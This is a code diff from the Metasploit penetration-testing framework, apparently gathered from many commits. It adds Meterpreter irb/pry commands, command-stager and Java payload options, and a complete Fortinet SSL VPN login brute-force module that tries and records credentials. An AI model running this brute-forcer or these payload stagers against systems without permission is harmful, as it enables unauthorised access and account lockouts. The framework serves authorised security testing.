    shell_command("rm -rf #{remote_file}")
  end

+  def cmd_irb_help
+    print_line('Usage: irb')
+    print_line
+    print_line('Open an interactive Ruby shell on the current session.')
+    print @@irb_opts.usage
+  end
+
+  #
+  # Open an interactive Ruby shell on the current session
+  #
+  def cmd_irb(*args)
+    expressions = []
+
+    # Parse the command options
+    @@irb_opts.parse(args) do |opt, idx, val|
+      case opt
+      when '-e'
+        expressions << val
+      when '-h'
+        return cmd_irb_help
+      end
+    end
+
+    session = self
+    framework = self.framework
+
+    if expressions.empty?
+      print_status('Starting IRB shell...')
+      print_status("You are in the \"self\" (session) object\n")
+
+      Rex::Ui::Text::IrbShell.new(self).run
+    else
+      # XXX: No vprint_status here
+      if framework.datastore['VERBOSE'].to_s == 'true'
+        print_status("You are executing expressions in #{binding.receiver}")
+      end
+
+      expressions.each { |expression| eval(expression, binding) }
+    end
+  end
+
+  def cmd_pry_help
+    print_line 'Usage: pry'
+    print_line
+    print_line 'Open the Pry debugger on the current session.'
+    print_line
+  end
+
+  #
+  # Open the Pry debugger on the current session
+  #
+  def cmd_pry(*args)
+    if args.include?('-h')
+      cmd_pry_help
+      return
+    end
+
+    begin
+      require 'pry'
+    rescue LoadError
+      print_error('Failed to load Pry, try "gem install pry"')
+      return
+    end
+
+    print_status('Starting Pry shell...')
+    print_status("You are in the \"self\" (session) object\n")
+
+    self.pry
+  end
+
  #
  # Explicitly runs a single line command.
  #
@@ -486,7 +584,7 @@ class CommandShell
    # Do nil check for cmd (CTRL+D will cause nil error)
    return unless cmd

-    arguments = cmd.split(' ')
+    arguments = Shellwords.shellwords(cmd)
    method    = arguments.shift

    # Built-in command
@@ -80,6 +80,7 @@ module Scriptable
      'killav' => 'post/windows/manage/killav',
      'metsvc' => 'post/windows/manage/persistence_exe',
      'migrate' => 'post/windows/manage/migrate',
+      'pml_driver_config' => 'exploit/windows/local/service_permissions',
      'packetrecorder' => 'post/windows/manage/rpcapd_start',
      'persistence' => 'post/windows/manage/persistence_exe',
      'prefetchtool' => 'post/windows/gather/enum_prefetch',
@@ -20,6 +20,7 @@ require 'backports'
 require 'bigdecimal'

 def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
  BigDecimal(*args, **kwargs)
 end
 # Remove bigdecimal warning - end
@@ -73,19 +73,19 @@ OS_RESOURCE_LOSS       = 'os-resource-loss'
 #

 # Modules leaves payload or a dropper on the target machine
-ARTIFACTS_ON_DISK      = 'artifacts-on-disk'
+ARTIFACTS_ON_DISK = 'artifacts-on-disk'
 # Module modifies some config file on the target machine
-CONFIG_CHANGES         = 'config-changes'
+CONFIG_CHANGES    = 'config-changes'
 # Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log)
-IOC_IN_LOGS            = 'ioc-in-logs'
+IOC_IN_LOGS       = 'ioc-in-logs'
 # Module may cause account lockouts (likely due to brute-forcing)
-ACCOUNT_LOCKOUTS       = 'account-lockouts'
+ACCOUNT_LOCKOUTS  = 'account-lockouts'
 # Module may show something on the screen (Example: a window pops up)
-SCREEN_EFFECTS         = 'screen-effects'
+SCREEN_EFFECTS    = 'screen-effects'
 # Module may cause a noise (Examples: audio output from the speakers or hardware beeps)
-AUDIO_EFFECTS          = 'audio-effects'
+AUDIO_EFFECTS     = 'audio-effects'
 # Module may produce physical effects (Examples: the device makes movement or flashes LEDs)
-PHYSICAL_EFFECTS       = 'physical-effects'
+PHYSICAL_EFFECTS  = 'physical-effects'

 #
 # Reliability
@@ -95,6 +95,8 @@ PHYSICAL_EFFECTS       = 'physical-effects'
 FIRST_ATTEMPT_FAIL = 'first-attempt-fail'
 # The module is expected to get a shell every time it fires
 REPEATABLE_SESSION = 'repeatable-session'
+# The module isn't expected to get a shell reliably (such as only once)
+UNRELIABLE_SESSION = 'unreliable-session'

 module HttpClients
  IE = "MSIE"
@@ -57,6 +57,7 @@ module Exploit::CmdStager
      [
        OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
        OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
+        OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
        OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
      ], self.class)
  end
@@ -129,6 +130,12 @@ module Exploit::CmdStager

    self.stager_instance = create_stager

+    if datastore['CMDSTAGER::TEMP']
+      opts[:temp] = datastore['CMDSTAGER::TEMP']
+    elsif datastore['WritableDir']
+      opts[:temp] = datastore['WritableDir']
+    end
+
    if stager_instance.respond_to?(:http?) && stager_instance.http?
      opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
      opts[:payload_uri] = start_service(opts)
@@ -82,6 +82,9 @@ module Exploit::Remote::HttpClient
    register_autofilter_services(%W{ http https })
  end

+  def deregister_http_client_options
+    deregister_options('RHOST', 'RPORT', 'VHOST', 'SSL', 'Proxies')
+  end

  #
  # For HTTP Client exploits, we often want to verify that the server info matches some regex before
@@ -480,7 +483,7 @@ module Exploit::Remote::HttpClient
  end

  # Returns the complete URI as string including the scheme, port and host
-  def full_uri(custom_uri = nil)
+  def full_uri(custom_uri = nil, vhost_uri: false)
    uri_scheme = ssl ? 'https' : 'http'

    if (rport == 80 && !ssl) || (rport == 443 && ssl)
@@ -491,7 +494,9 @@ module Exploit::Remote::HttpClient

    uri = normalize_uri(custom_uri || target_uri.to_s)

-    if Rex::Socket.is_ipv6?(rhost)
+    if vhost_uri && datastore['VHOST']
+      uri_host = datastore['VHOST']
+    elsif Rex::Socket.is_ipv6?(rhost)
      uri_host = "[#{rhost}]"
    else
      uri_host = rhost
@@ -68,6 +68,24 @@ module Exploit::Remote::HTTP::Drupal
    res.body
  end

+  # Check CHANGELOG.txt for patch level
+  #
+  # @param changelog [String] CHANGELOG.txt to search
+  # @param patch [String] Patch to check for (example: SA-CORE-2019-003)
+  # @return [Boolean, nil] Whether or not the patch was found or unknown
+  def drupal_patch(changelog, patch)
+    return unless changelog && patch
+
+    # HACK: Patch level removed since undetermined 8.x release
+    if changelog.include?('For a full list of fixes in the latest release')
+      return nil
+    elsif changelog.include?(patch)
+      return true
+    end
+
+    false
+  end
+
  # Match a Drupal version
  #
  # @param string [String] String to match against
@@ -204,7 +204,7 @@ module Exploit::Remote::HttpServer
  end

  # Set {#on_request_uri} to handle the given +uri+ in addition to the one
-  # specified by the user in URIPATH.
+  # specified by the developer in opts['Path'] or by the user in URIPATH.
  #
  # @note This MUST be called from {#primer} so that the service has been set
  # up but we have not yet entered the listen/accept loop.
@@ -79,6 +79,21 @@ module Msf
              int
            end

+            # Extracts a byte from an IO
+            #
+            # @param io [IO] the io to extract the byte from
+            # @return [Byte, nil] the extracted byte if success, nil otherwise
+            def extract_byte(io)
+              byte_raw = io.read(1)
+              
+              unless byte_raw && byte_raw.length == 1
+                return nil
+              end
+              byte = byte_raw.unpack('C')[0]
+                      
+              byte
+            end
+
            # Extracts a long from an IO
            #
            # @param io [IO] the io to extract the long from
@@ -102,9 +117,17 @@ module Msf
            # @see Msf::Exploit::Remote::Java::Rmi::Client::Registry::Parser#parse_registry_lookup_endpoint
            def extract_reference(io)
              ref = extract_string(io)
-              unless ref && ref == 'UnicastRef'
+              unless ref && (ref == 'UnicastRef' || ref == 'UnicastRef2')
                return nil
              end
+              
+              if ref == 'UnicastRef2'
+                form = extract_byte(io)
+
+                unless form == 0 || form == 1 # FORMAT_HOST_PORT or FORMAT_HOST_PORT_FACTORY
+                  return nil
+                end
+              end

              address = extract_string(io)
              return nil unless address
@@ -82,6 +82,10 @@ module Exploit::Remote::Tcp
    )
  end

+  def deregister_tcp_options
+    deregister_options('RHOST', 'RPORT')
+  end
+
  #
  # Establishes a TCP connection to the specified RHOST/RPORT
  #
@@ -29,6 +29,10 @@ module Exploit::Remote::Udp
    )
  end

+  def deregister_udp_options
+    deregister_options('RHOST', 'RPORT')
+  end
+
  #
  # Creates a UDP socket for communicating with a remote host
  #
@@ -403,6 +403,14 @@ class Msf::Module::Platform
    Alias = "juniper"
  end

+  #
+  # Ubiquiti Unifi
+  #
+  class Unifi < Msf::Module::Platform
+    Rank = 100
+    Alias = "unifi"
+  end
+
  #
  # Solaris
  #
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/java/payload_options'

 module Msf

@@ -17,15 +18,15 @@ module Payload::Java::BindTcp
  include Msf::Payload::TransportConfig
  include Msf::Payload::Java
  include Msf::Payload::UUID::Options
+  include Msf::Payload::Java::PayloadOptions

  #
-  # Register Java reverse_http specific options
+  # Register Java bind_tcp specific options
  #
  def initialize(*args)
    super
    register_advanced_options([
      Msf::OptString.new('AESPassword', [false, "Password for encrypting communication", '']),
-      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
    ])
  end

@@ -37,7 +38,7 @@ module Payload::Java::BindTcp
  end

  def include_send_uuid
-      false
+    false
  end

  #
@@ -45,9 +46,7 @@ module Payload::Java::BindTcp
  #
  def stager_config(opts={})
    ds = opts[:datastore] || datastore
-    spawn = ds["Spawn"] || 2
-    c =  ""
-    c << "Spawn=#{spawn}\n"
+    c = super
    pass = ds["AESPassword"] || ''
    if pass != ""
      c << "AESPassword=#{pass}\n"
@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf::Payload::Java::PayloadOptions
+
+  def initialize(info = {})
+    super(info)
+    register_advanced_options(
+      [
+        Msf::OptBool.new('JavaMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]),
+        Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
+      ]
+    )
+  end
+
+  #
+  # Generate default configuration that is to be included in the stager.
+  #
+  def stager_config(opts={})
+    ds = opts[:datastore] || datastore
+    spawn = ds["Spawn"] || 2
+    c =  ""
+    if ds["JavaMeterpreterDebug"]
+      spawn = 0
+      c << "StageParameters=NoRedirect\n"
+    end
+    c << "Spawn=#{spawn}\n"
+    c
+  end
+
+end
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/java/payload_options'

 module Msf

@@ -17,6 +18,7 @@ module Payload::Java::ReverseHttp
  include Msf::Payload::TransportConfig
  include Msf::Payload::Java
  include Msf::Payload::UUID::Options
+  include Msf::Payload::Java::PayloadOptions

  #
  # Register Java reverse_http specific options
@@ -25,7 +27,6 @@ module Payload::Java::ReverseHttp
    super
    register_advanced_options(
      [
-        OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]),
        OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']),
      ] +
      Msf::Opt::http_header_options
@@ -64,9 +65,8 @@ module Payload::Java::ReverseHttp
  def stager_config(opts={})
    uri = generate_uri(opts)
    ds = opts[:datastore] || datastore
+    c = super

-    c =  ''
-    c << "Spawn=#{ds["Spawn"] || 2}\n"
    c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"]
    c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"]
    c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"]
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/java/payload_options'

 module Msf

@@ -17,15 +18,15 @@ module Payload::Java::ReverseTcp
  include Msf::Payload::TransportConfig
  include Msf::Payload::Java
  include Msf::Payload::UUID::Options
+  include Msf::Payload::Java::PayloadOptions

  #
-  # Register Java reverse_http specific options
+  # Register Java reverse_tcp specific options
  #
  def initialize(*args)
    super
    register_advanced_options([
      Msf::OptString.new('AESPassword', [false, "Password for encrypting communication", '']),
-      Msf::OptInt.new('Spawn', [true, "Number of subprocesses to spawn", 2])
    ])
  end

@@ -37,17 +38,16 @@ module Payload::Java::ReverseTcp
  end

  def include_send_uuid
-      false
+    false
  end

+
  #
  # Generate configuration that is to be included in the stager.
  #
  def stager_config(opts={})
+    c = super
    ds = opts[:datastore] || datastore
-    spawn = ds["Spawn"] || 2
-    c =  ""
-    c << "Spawn=#{spawn}\n"
    pass = ds["AESPassword"] || ''
    if pass != ""
      c << "AESPassword=#{pass}\n"
@@ -75,6 +75,7 @@ class Msf::Payload::UUID
    24 => 'r',
    25 => 'apple_ios',
    26 => 'juniper',
+    27 => 'unifi',
  }

  # The raw length of the UUID structure
@@ -75,12 +75,18 @@ module System
      system_data[:distro] = "mandrake"
      system_data[:version] = version

-    #SuSE
+    # SuSE
    elsif etc_files.include?("SuSE-release")
      version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
      system_data[:distro] = "suse"
      system_data[:version] = version

+    # OpenSUSE
+    elsif etc_files.include?("SUSE-brand")
+      version = read_file("/etc/SUSE-brand").scan(/^VERSION\s*=\s*([\d\.]+)/).flatten.first
+      system_data[:distro] = 'suse'
+      system_data[:version] = version
+
    # Gentoo
    elsif etc_files.include?("gentoo-release")
      version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
@@ -127,7 +127,7 @@ module Msf::Post::Windows::Priv
    uac = false
    winversion = session.sys.config.sysinfo['OS']

-    if winversion =~ /Windows (Vista|7|8|2008|2012|10|2016)/
+    if winversion =~ /Windows (Vista|7|8|2008|2012|10|2016|2019)/
      unless is_system?
        begin
          enable_lua = registry_getvaldata(
@@ -126,7 +126,7 @@ module ModuleCommandDispatcher
      return
    end

-    ip_range_arg = args.shift || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || ''
+    ip_range_arg = args.join(' ') || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || ''
    opt = Msf::OptAddressRange.new('RHOSTS')

    begin
@@ -16,7 +16,7 @@
 #
 # config.autoload_paths << Rails.root.join('lib')
 #
-if PG::VERSION != '0.21.0' || ActiveRecord.version.to_s != '4.2.11'
+if PG::VERSION != '0.21.0' || ActiveRecord.version.to_s != '4.2.11.1'
  puts <<MSG
 -----------------------------------------------------------------------------------
 The pg and/or activerecord gem version has changed, meaning deprecated pg constants
@@ -48,31 +48,31 @@ class Console::CommandDispatcher::Core
  #
  def commands
    c = {
-      '?'            => 'Help menu',
-      'background'   => 'Backgrounds the current session',
-      'bg'           => 'Alias for background',
-      'close'        => 'Closes a channel',
-      'channel'      => 'Displays information or control active channels',
-      'exit'         => 'Terminate the meterpreter session',
-      'help'         => 'Help menu',
-      'irb'          => 'Open an interactive Ruby shell on the current session',
-      'pry'          => 'Open the Pry debugger on the current session',
-      'use'          => 'Deprecated alias for "load"',
-      'load'         => 'Load one or more meterpreter extensions',
-      'machine_id'   => 'Get the MSF ID of the machine attached to the session',
-      'guid'         => 'Get the session GUID',
-      'quit'         => 'Terminate the meterpreter session',
-      'resource'     => 'Run the commands stored in a file',
-      'uuid'         => 'Get the UUID for the current session',
-      'read'         => 'Reads data from a channel',
-      'run'          => 'Executes a meterpreter script or Post module',
-      'bgrun'        => 'Executes a meterpreter script as a background thread',
-      'bgkill'       => 'Kills a background meterpreter script',
-      'get_timeouts' => 'Get the current session timeout values',
-      'set_timeouts' => 'Set the current session timeout values',
-      'sessions'     => 'Quickly switch to another session',
-      'bglist'       => 'Lists running background scripts',
-      'write'        => 'Writes data to a channel',
+      '?'                        => 'Help menu',
+      'background'               => 'Backgrounds the current session',
+      'bg'                       => 'Alias for background',
+      'close'                    => 'Closes a channel',
+      'channel'                  => 'Displays information or control active channels',
+      'exit'                     => 'Terminate the meterpreter session',
+      'help'                     => 'Help menu',
+      'irb'                      => 'Open an interactive Ruby shell on the current session',
+      'pry'                      => 'Open the Pry debugger on the current session',
+      'use'                      => 'Deprecated alias for "load"',
+      'load'                     => 'Load one or more meterpreter extensions',
+      'machine_id'               => 'Get the MSF ID of the machine attached to the session',
+      'guid'                     => 'Get the session GUID',
+      'quit'                     => 'Terminate the meterpreter session',
+      'resource'                 => 'Run the commands stored in a file',
+      'uuid'                     => 'Get the UUID for the current session',
+      'read'                     => 'Reads data from a channel',
+      'run'                      => 'Executes a meterpreter script or Post module',
+      'bgrun'                    => 'Executes a meterpreter script as a background thread',
+      'bgkill'                   => 'Kills a background meterpreter script',
+      'get_timeouts'             => 'Get the current session timeout values',
+      'set_timeouts'             => 'Set the current session timeout values',
+      'sessions'                 => 'Quickly switch to another session',
+      'bglist'                   => 'Lists running background scripts',
+      'write'                    => 'Writes data to a channel',
      'enable_unicode_encoding'  => 'Enables encoding of unicode strings',
      'disable_unicode_encoding' => 'Disables encoding of unicode strings'
    }
@@ -23,14 +23,14 @@ class MetasploitModule < Msf::Auxiliary
      'Author'         => [ 'sinn3r' ]
    ))

+    deregister_udp_options
+
    register_options(
      [
        OptString.new("MAC",      [true, 'Specify a MAC address', '00:90:27:85:cf:01']),
        OptString.new("PASSWORD", [false, 'Specify a four or six-byte password']),
        OptBool.new("IPV6",       [false, 'Use IPv6 broadcast', false])
      ])
-
-    deregister_options('RHOST', 'RPORT')
  end

  #
@@ -88,9 +88,7 @@ class MetasploitModule < Msf::Auxiliary
      res = send_request_cook('Off', 0)
    end

-    time = res.get_xml_document.at('//time')
-
-    unless res && res.code == 200 && time
+    unless res && res.code == 200 && (time = res.get_xml_document.at('//time'))
      print_error("Failed to #{action.name.downcase}, aborting!")
      return
    end
@@ -111,17 +109,17 @@ class MetasploitModule < Msf::Auxiliary
  end

  def generate_soap_xml(temp, time)
-    <<EOF
-<?xml version="1.0" encoding="utf-8"?>
-<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
-  <s:Body>
-    <u:SetCrockpotState xmlns:u="urn:Belkin:service:basicevent:1">
-      <mode>#{modes[temp]}</mode>
-      <time>#{time}</time>
-    </u:SetCrockpotState>
-  </s:Body>
-</s:Envelope>
-EOF
+    <<~EOF
+      <?xml version="1.0" encoding="utf-8"?>
+      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+        <s:Body>
+          <u:SetCrockpotState xmlns:u="urn:Belkin:service:basicevent:1">
+            <mode>#{modes[temp]}</mode>
+            <time>#{time}</time>
+          </u:SetCrockpotState>
+        </s:Body>
+      </s:Envelope>
+    EOF
  end

  def modes
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture
-  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
@@ -28,6 +27,12 @@ class MetasploitModule < Msf::Auxiliary
        ],
      'DisclosureDate' => 'Apr 26 2000'))

+    register_options([
+        Opt::RPORT(80),
+        Opt::RHOST
+      ]
+    )
+
    deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
  end

@@ -23,6 +23,8 @@ class MetasploitModule < Msf::Auxiliary
        ]
    ))

+    deregister_http_client_options
+
    register_options(
      [
        OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
@@ -34,8 +36,6 @@ class MetasploitModule < Msf::Auxiliary
        OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
        OptBool.new('GET_HISTORY', [false, "Get company history", false])
      ])
-
-    deregister_options('RHOST', 'RPORT', 'VHOST', 'Proxies')
  end

  def rhost_corpwatch
@@ -25,6 +25,8 @@ class MetasploitModule < Msf::Auxiliary
        ]
    ))

+    deregister_http_client_options
+
    register_options(
      [
        OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
@@ -32,8 +34,6 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
        OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
      ])
-
-    deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
  end

  def rhost_corpwatch
@@ -34,6 +34,9 @@ class MetasploitModule < Msf::Auxiliary
      },
      'License'     => MSF_LICENSE,
      'Author'      => 'bcoles'))
+
+    deregister_http_client_options
+
    register_options(
      [
        OptString.new('URL', [ false, 'The target URL', '' ]),
@@ -41,7 +44,6 @@ class MetasploitModule < Msf::Auxiliary
        OptEnum.new('URL_TYPE', [ true, 'The type of URL(s) specified', 'html', [ 'pdf', 'html' ] ]),
        OptBool.new('STORE_LOOT', [ false, 'Store authors in loot', true ])
      ])
-    deregister_options 'RHOST', 'RPORT', 'VHOST'
  end

  def progress(current, total)
@@ -17,6 +17,8 @@ class MetasploitModule < Msf::Auxiliary
      'Author' => [ 'Nixawk' ],
      'License' => MSF_LICENSE))

+    deregister_http_client_options
+
    register_options(
      [
        OptString.new('TARGET', [ true, "The target to locate subdomains for, ex: rapid7.com, 8.8.8.8"]),
@@ -24,8 +26,6 @@ class MetasploitModule < Msf::Auxiliary
        OptBool.new('ENUM_BING', [ true, "Enable Bing Search Subdomains", true]),
        OptBool.new('ENUM_YAHOO', [ true, "Enable Yahoo Search Subdomains", true])
      ])
-
-    deregister_options('RHOST', 'RPORT', 'VHOST', 'SSL', 'Proxies')
  end

  def rhost_yahoo
@@ -29,10 +29,6 @@ class MetasploitModule < Msf::Auxiliary
      )
    )

-    deregister_options('RHOST', 'SSL', 'DOMAIN', 'DigestAuthIIS', 'NTLM::SendLM',
-      'NTLM::SendNTLM', 'VHOST', 'RPORT', 'NTLM::SendSPN', 'NTLM::UseLMKey',
-      'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
-
    register_options(
      [
        OptString.new('TARGET', [true, 'The target to get the score of']),
@@ -7,7 +7,6 @@ require 'net/https'
 require 'uri'

 class MetasploitModule < Msf::Auxiliary
-  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
@@ -32,10 +31,6 @@ class MetasploitModule < Msf::Auxiliary
      )
    )

-    deregister_options('RHOST', 'DOMAIN', 'DigestAuthIIS', 'NTLM::SendLM',
-      'NTLM::SendNTLM', 'VHOST', 'RPORT', 'NTLM::SendSPN', 'NTLM::UseLMKey',
-      'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
-
    register_options(
      [
        OptString.new('SHODAN_APIKEY', [true, 'The SHODAN API key']),
@@ -39,7 +39,6 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('SMBDomain', [ false, "SMB Domain", '']),
      ])

-    deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion')
  end

  # Determine the type of share based on an ID type value
@@ -26,10 +26,6 @@ class MetasploitModule < Msf::Auxiliary
      'License'     => MSF_LICENSE
      ))

-      deregister_options('RHOST', 'DOMAIN', 'DigestAuthIIS', 'NTLM::SendLM',
-            'NTLM::SendNTLM', 'VHOST', 'RPORT', 'NTLM::SendSPN', 'NTLM::UseLMKey',
-            'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'SSL')
-
      register_options(
        [
          OptString.new('USERNAME', [true, 'The ZoomEye username']),
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
      'License'     => MSF_LICENSE
    )

-    deregister_options('RHOST', 'RPORT')
+    deregister_tcp_options
  end

  # Obtain information about a single host
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
      'uri'     =>  uri
    )

-    return (res && res.body.include?("SSL VPN Service"))
+    return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))
  end

  def list_files(path)
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Fortinet SSL VPN Bruteforce Login Utility',
+      'Description'    => %{
+        This module scans for Fortinet SSL VPN web login portals and
+        performs login brute force to identify valid credentials.
+      },
+      'Author'         => [ 'Max Michels <kontakt[at]maxmichels.de>' ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 443
+        }
+    ))
+
+    register_options(
+      [
+        OptString.new('DOMAIN', [false, "Domain/Realm to use for each account", ''])
+      ])
+  end
+
+  def run_host(ip)
+    unless check_conn?
+      vprint_error("Connection failed, Aborting...")
+      return false
+    end
+
+    unless is_app_ssl_vpn?
+      vprint_error("Application does not appear to be Fortinet SSL VPN. Module will not continue.")
+      return false
+    end
+
+    vprint_good("Application appears to be Fortinet SSL VPN. Module will continue.")
+
+    vprint_status("Starting login brute force...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  # Verify if server is responding
+  def check_conn?
+    begin
+      res = send_request_cgi('uri' => '/', 'method' => 'GET')
+      if res
+        vprint_good("Server is responsive...")
+        return true
+      end
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+    end
+    false
+  end
+
+  def get_login_resource
+    send_request_raw(
+      'uri' => '/remote/login?lang=en'
+    )
+  end
+
+  # Verify whether we're working with SSL VPN or not
+  def is_app_ssl_vpn?
+    res = get_login_resource
+    res && res.code == 200 && res.body.match(/fortinet/)
+  end
+
+  def do_logout(cookie)
+    send_request_cgi(
+      'uri' => '/remote/logout',
+      'method' => 'GET',
+      'cookie' => cookie
+    )
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'Fortinet SSL VPN',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  # Brute-force the login page
+  def do_login(user, pass)
+    vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")
+
+    begin
+      post_params = {
+        'ajax'  => '1',
+        'username' => user,
+        'credential' => pass
+      }
+
+      #check to use domain/realm or not
+      if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?
+        post_params['realm'] = ""
+      else
+        post_params['realm'] = datastore['DOMAIN']
+      end
+
+      res = send_request_cgi(
+              'uri' => '/remote/logincheck',
+              'method' => 'POST',
+              'ctype' => 'application/x-www-form-urlencoded',
+              'vars_post' => post_params
+            )
+
+      if res &&
+         res.code == 200 &&
+         res.body.match(/redir=/) &&
+         res.body.match(/&portal=/)
+
+        do_logout(res.get_cookies)
+        if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?
+          print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+          report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
+          report_note(ip: rhost, type: "fortinet.ssl.vpn",data: "User: #{user}")
+        else
+          print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{datastore["DOMAIN"]}")
+          report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
+          report_note(ip: rhost, type: "fortinet.ssl.vpn",data: "User: #{user} / Domain: #{datastore["DOMAIN"]}")
+        end
+
+        return :next_user
+
+      else
+        vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+      end
+
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+      vprint_error("HTTP Connection Failed, Aborting")
+      return :abort
+    end
+  end
+end
@@ -171,23 +171,27 @@ class MetasploitModule < Msf::Auxiliary
      }
    })

+    sys_name = get_system_name(res)
+
+    if sys_name.blank?
+      print_error 'Could not retrieve system name.'
+      return
+    end
+
    version = get_version(res)
    unless version.blank?
      print_status("Version detected: #{version}")
      unless is_version_tested?(version)
-        print_warning("You're running the module against a version we have not tested")
+        print_warning("You're running the module against a version we have not tested.")
      end
    end

-    sys_name = get_system_name(res)
-    unless sys_name.blank?
-      print_good("System name detected: #{sys_name}")
-      report_note(
-        :host => ip,
-        :type => "system.name",
-        :data => sys_name
-      )
-    end
+    print_good("System name detected: #{sys_name}")
+    report_note(
+      :host => ip,
+      :type => "system.name",
+      :data => sys_name
+    )

    if anonymous_access?(res)
      print_good("No login necessary. Server allows anonymous access.")
@@ -255,7 +255,7 @@ class MetasploitModule < Msf::Auxiliary
    else
      print_good("Found #{@dirs.size} directories")
      @dirs.each do |x|
-        print_line("#{proto}://#{datastore['RHOST']}#{@path}#{x}")
+        print_good("#{proto}://#{datastore['RHOST']}#{@path}#{x}")
      end
    end

@@ -264,7 +264,7 @@ class MetasploitModule < Msf::Auxiliary
    else
      print_good("Found #{@files.size} files")
      @files.each do |x|
-        print_line("#{proto}://#{datastore['RHOST']}#{@path}#{x}")
+        print_good("#{proto}://#{datastore['RHOST']}#{@path}#{x}")
      end
    end
  end
@@ -54,6 +54,7 @@ class MetasploitModule < Msf::Auxiliary

      apps = [
        '/jmx-console/HtmlAdaptor',
+        '/jmx-console/checkJNDI.jsp',
        '/status',
        '/web-console/ServerInfo.jsp',
        # apps added per Patrick Hof
@@ -45,13 +45,29 @@ class MetasploitModule < Msf::Auxiliary
